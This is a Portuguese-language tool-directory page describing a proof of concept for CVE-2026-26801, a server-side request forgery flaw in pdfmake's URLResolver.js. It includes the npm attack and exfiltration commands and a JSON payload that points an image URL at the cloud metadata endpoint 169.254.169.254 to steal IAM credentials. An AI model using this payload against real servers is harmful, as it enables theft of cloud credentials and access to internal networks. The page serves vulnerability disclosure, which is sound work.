Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-26801-pdfmake-ssrf — PoC para CVE-2026-26801: SSRF em pdfmake URLResolver.js (>= 0.3.0-beta.2, <= 0.3.5) | Kitploit
Ferramentas/GitHubGitHub/mariopepe/cve-2026-26801-pdfmake-ssrf
Análise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança WebTestes de Penetração
GitHubmariopepe/cve-2026-26801-pdfmake-ssrf

CVE-2026-26801-pdfmake-ssrf

PoC para CVE-2026-26801: SSRF em pdfmake URLResolver.js (>= 0.3.0-beta.2, <= 0.3.5)

Ver Repositório
há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PoC da Vulnerabilidade SSRF no pdfmake

Resumo da Vulnerabilidade

CampoValor
Pacotepdfmake
Versão>= 0.3.0-beta.2, <= 0.3.5
Corrigida0.3.6
CVECVE-2026-26801
TipoServer-Side Request Forgery (SSRF)
Localizaçãosrc/URLResolver.js
GravidadeALTA

Causa Raiz

root@kitploit:~
// URLResolver.js line 3
const response = await fetch(url, { headers });  // NO VALIDATION!

Quando docDefinition contém URLs em images, attachments ou files, o pdfmake as busca sem qualquer validação:

  • Sem allowlist/blocklist para domínios
  • Sem proteção contra IPs internos (127.0.0.1, 169.254.169.254, 10.x.x.x)
  • Cabeçalhos personalizados suportados (permite bypass de autenticação)

Reprodução

Configuração

root@kitploit:~
npm install

Terminal 1 - Servidor Mock de Metadados AWS

root@kitploit:~
npm run metadata

Terminal 2 - Servidor PDF Vulnerável

root@kitploit:~
npm run server

Terminal 3 - Executar o Ataque

SSRF Cego (prova que o servidor faz requisições externas):

root@kitploit:~
npm run attack

SSRF com Leitura Completa (credenciais incorporadas no PDF gerado):

root@kitploit:~
npm run exfiltrate

Resultados Esperados

SSRF Cego (npm run attack)

Saída do Servidor de Metadados:

root@kitploit:~
[METADATA] GET /latest/meta-data/iam/security-credentials/vulnerable-ec2-role
[METADATA] >>> CREDENTIALS LEAKED! <<<

Isso prova que o servidor vulnerável fez uma requisição externa para nosso endpoint controlado.

SSRF com Leitura Completa (npm run exfiltrate)

O script de ataque gera exfiltrated.pdf. Abra-o em qualquer visualizador de PDF e o JSON das credenciais AWS estará incorporado como anexo de arquivo (metadata.json). Isso prova a exfiltração completa de dados, não apenas SSRF cego. O atacante obtém o corpo real da resposta de volta dentro do PDF.

Impacto no Mundo Real

  1. Roubo de Credenciais AWS/GCP/Azure - Acessar endpoints de metadados na nuvem
  2. Acesso à Rede Interna - Alcançar serviços internos
  3. Varredura de Portas - Enumeração da infraestrutura interna
  4. Bypass de Autenticação - Cabeçalhos personalizados para contornar autenticação

Payload do Ataque

root@kitploit:~
{
  "content": ["Hello"],
  "images": {
    "x": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
  }
}

Writeup

Writeup técnico completo com a história de como isso foi encontrado, a cadeia de ataque e a linha do tempo da divulgação: mariopepe.github.io/cve-2026-26801-pdfmake-ssrf

Baixar ferramenta